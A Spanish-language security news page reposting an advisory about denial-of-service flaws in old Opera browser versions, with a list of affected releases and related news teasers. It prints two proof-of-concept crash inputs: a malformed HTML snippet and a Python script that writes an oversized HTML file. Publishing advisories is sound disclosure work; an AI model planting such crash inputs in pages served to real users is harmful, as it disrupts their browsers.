Vulnerabilidad - Denegación de servicio en Opera Web Browser


Opera Web Browser es propenso a múltiples vulnerabilidades que pueden resultar en un fallo del programa.





El problema se produce cuando el navegador intenta interpretar cierto contenido HTML creado maliciosamente.

No se ha comprobado que esta vulnerabilidad pueda ser utilizada para la ejecución remota de código.

Han sido publicados los siguientes ejemplos, que insertados en una página HTML serían capaces de hacer fallar a este
navegador.

El primer ejemplo es un código HTML mal formado:

<html><head></head><body><bdo>A<bgsound style=
"margin:-99;">A<hr>A<hr></body></html>

El segundo ejemplo es el código de un script para Python, el conocido lenguaje interpretado, el cuál genera en este caso,
contenido HTML:

html = open("opera.html", "w")
html.write("<html style=\"content: url(0);\">\n")
html.write("<head></head>\n")
buff1 = 'A'*32499
html.write("<bodyA>\n"+buff1+"\n")
buff2 = 'B'*153
html.write("<u "+buff2+">\n")
html.write("</body></html>")
html.close()


* Productos vulnerables:

- Opera Web Browser 8.5
- Opera Web Browser 8.0.2
- Opera Web Browser 8.0.1
- Opera Web Browser 8.0
- Opera Web Browser 7.54
- Opera Web Browser 7.53
- Opera Web Browser 7.52
- Opera Web Browser 7.51
- Opera Web Browser 7.50
- Opera Web Browser 7.23
- Opera Web Browser 7.22
- Opera Web Browser 7.21
- Opera Web Browser 7.20 Beta 1 build 2981
- Opera Web Browser 7.20
- Opera Web Browser 7.11.j
- Opera Web Browser 7.11.b
- Opera Web Browser 7.11
- Opera Web Browser 7.10
- Opera Web Browser 7.0 win32 Beta 2
- Opera Web Browser 7.0 win32 Beta 1
- Opera Web Browser 7.0 win32
- Opera Web Browser 7.0.3 win32
- Opera Web Browser 7.0.2 win32
- Opera Web Browser 7.0.1 win32
- Opera Web Browser 6.10 linux
- Opera Web Browser 6.0.5 win32
- Opera Web Browser 6.0.4 win32
- Opera Web Browser 6.0.3 win32
- Opera Web Browser 6.0.3 linux
- Opera Web Browser 6.0.2 win32
- Opera Web Browser 6.0.2 linux
- Opera Web Browser 6.0.1 win32
- Opera Web Browser 6.0.1 linux
- Opera Web Browser 6.0.1
- Opera Web Browser 6.0 win32
- Opera Web Browser 6.0.6
- Opera Web Browser 6.0.6 win32
- Opera Web Browser 6.0
- Opera Web Browser 5.12 win32
- Opera Web Browser 5.12
- Opera Web Browser 5.1.1 win32
- Opera Web Browser 5.1.0 win32
- Opera Web Browser 5.0.2 win32
- Opera Web Browser 5.0 Mac
- Opera Web Browser 5.0 Linux
- Opera Web Browser 8 Beta 3


* Soluciones:

No existe al momento actual, ninguna solución oficial para este problema.


* Relacionados:

Opera Web Browser Multiple Malformed HTML Parsing Denial Of Service Vulnerabilities
http://www.securityfocus.com/bid/15124/info


* Créditos:

posidron@tripbit.net

Fuente:
Por Angela Ruiz
vsantivirus.com



Otras noticias de interés:

Desbordamiento de buffer en el navegador Opera
@stake ha anunciado -en www.atstake.com/research/advisories/2003/a102003-1.txt - la existencia de una vulnerabilidad en el navegador Opera que posibilita la ejecución de código....
Mes de los fallos en Twitter
La saga El mes de los fallos en comenzó en julio de 2006, cuando H.D Moore decidió dedicar un mes completo a publicar vulnerabilidades no parcheadas en los navegadores, a razón de una al día. La iniciativa, por lo original y relevante de la propu...
Automatización en ataques de phishing
Los procesos delictivos son cada vez más amplios y cualquier actividad que implique cierto grado de interacción entre la tecnología utilizada y una persona, constituye un potencial blanco para algún tipo de ataque....
Funcionan mejor los ataques de phishing en móviles
Según un post de Mickey Boodaei, CEO de la empresa de servicios de Seguridad Informática en Internet, Trusteer; los usuarios de teléfonos móviles son tres veces más propensos a ser víctimas de ataques de phishing que los usuarios de escritorio....
Cómo pasar de MS-Windows a GNU/Linux
En APC han publicado una completa guía en la que analizan cada una de las tareas diarias que un usuario de Windows realiza, y evalúan si esa misma tarea podría realizarse en Linux con mayor o menor eficiencia. El resultado es claro: pásate a Linu...
Los kioscos de acceso a Internet son inseguros
Los terminales de Internet tipo kiosco pueden ser intervenidos en pocos segundos, según demostró experto en la conferencia de hackers DefCon. ...
ALGUNOS HACKERS BUENOS
Excelente artículo de lectura recomendada: Enfrascados como estamos en una guerra sin precedentes, la guerra de la CNN y Al Yazira, nos olvidamos de nuestros ideales, nos olvidamos del hacktivismo. Nada más que se respira crispación, y todo...
Safe Creative lanza servicio para certificar el envío de un e-mail
mailstamper.com, un servicio que tiene como objetivo obtener la prueba de envío de un correo electrónico....
PROYECTO DE LEY DE DELITOS INFORMATICOS DE VENEZUELA
Sí eres Venezolano debes saber todo lo referente al Proyecto de Ley de Délitos Informáticos....
Los usuarios y no los servidores, atraen a los atacantes
Los atacantes actualmente tienden a asaltar a las empresas comprometiendo los sistemas del usuario final y utilizándolos para acceder a datos confidenciales, en lugar de poner en su punto de mira servidores de web y de correo electrónico, según un...

Brindanos
un o una


Redes Sociales

Publicidad


Gana Bitcoins desde tu casa

Categorías


Planeta Vaslibre

Blog Roll




Nube de tags

  • anonimato
  • anonimo
  • antivirus
  • apache
  • blog
  • browser
  • bsd
  • bug
  • centos
  • chrome
  • cifrado
  • computer
  • debian
  • denegacion
  • exploits
  • fedora
  • fice
  • firefox
  • forense
  • freebsd
  • gentoo
  • github
  • gnome
  • gnu
  • gpl
  • gtk
  • hack
  • hacking
  • hosting
  • informatica
  • internet
  • isos
  • libre
  • licencias
  • linux
  • linuxmint
  • lxde
  • micros
  • mint
  • mit
  • mozilla
  • mysql
  • noticia
  • opensource
  • opera
  • pgp
  • php
  • sabayon
  • seguridad
  • servicio
  • system
  • tecnologia
  • thunar
  • thunderbird
  • tor
  • troyanos
  • tware
  • ubuntu
  • underground
  • vaslibre
  • virus
  • viserproject
  • vivaldi
  • vulnerabilidad
  • vulnerabilidades
  • web
  • website
  • windows
  • xanadu
  • xfce
  • xombra